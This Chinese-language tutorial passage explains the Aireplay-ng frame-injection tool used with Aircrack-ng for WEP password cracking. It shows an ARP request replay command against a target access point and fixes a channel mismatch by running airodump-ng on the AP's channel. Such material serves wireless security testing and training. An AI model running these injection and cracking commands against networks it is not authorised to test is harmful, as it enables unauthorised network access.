Aireplay-ng是一个注入帧的工具，支持10种攻击类型，如解除认证攻击、伪造认证攻击、ARP请求包重放攻击等。当用户使用Aircrack-ng攻击实施密码暴破时，通常会使用Aireplay-ng来实施攻击，以加快捕获数据包的速度。例如，当实施WEP破解时，通常使用Aireplay-ng实施ARP请求包重放攻击，来加快捕获数据包。通常情况下，会出现监听接口与AP不在同一信道问题。类似输出信息如下所示：

C:\root> aireplay-ng -3 -b 14:E6:E4:84:23:7A -h 1C:77:F6:60:F2:CC wlan0mon
The interface MAC (00:0F:00:8D:A6:E2) doesn’t match the specified MAC (-h).
ifconfig wlan0mon hw ether 1C:77:F6:60:F2:CC
10:14:38  Waiting for beacon frame (BSSID: 14:E6:E4:84:23:7A) on channel 6
10:14:43  wlan0mon is on channel 6, but the AP uses channel 1
从输出的信息可以看到，监听接口wlan0mon工作在信道6，AP工作在信道1。所以，导致攻击失败。通常情况下，使用Aircrack-ng工具实施无线密码破解时，都是使用airodump-ng工具捕获数据包。此时，用户在捕获数据包时，可以通过指定监听数据的工作信道为目标AP工作的信道来解决该问题。由于AP工作在信道，所以这里需要设置无线网卡监听信道为1。执行命令如下所示：

C:\root> airodump-ng wlan0mon -c 1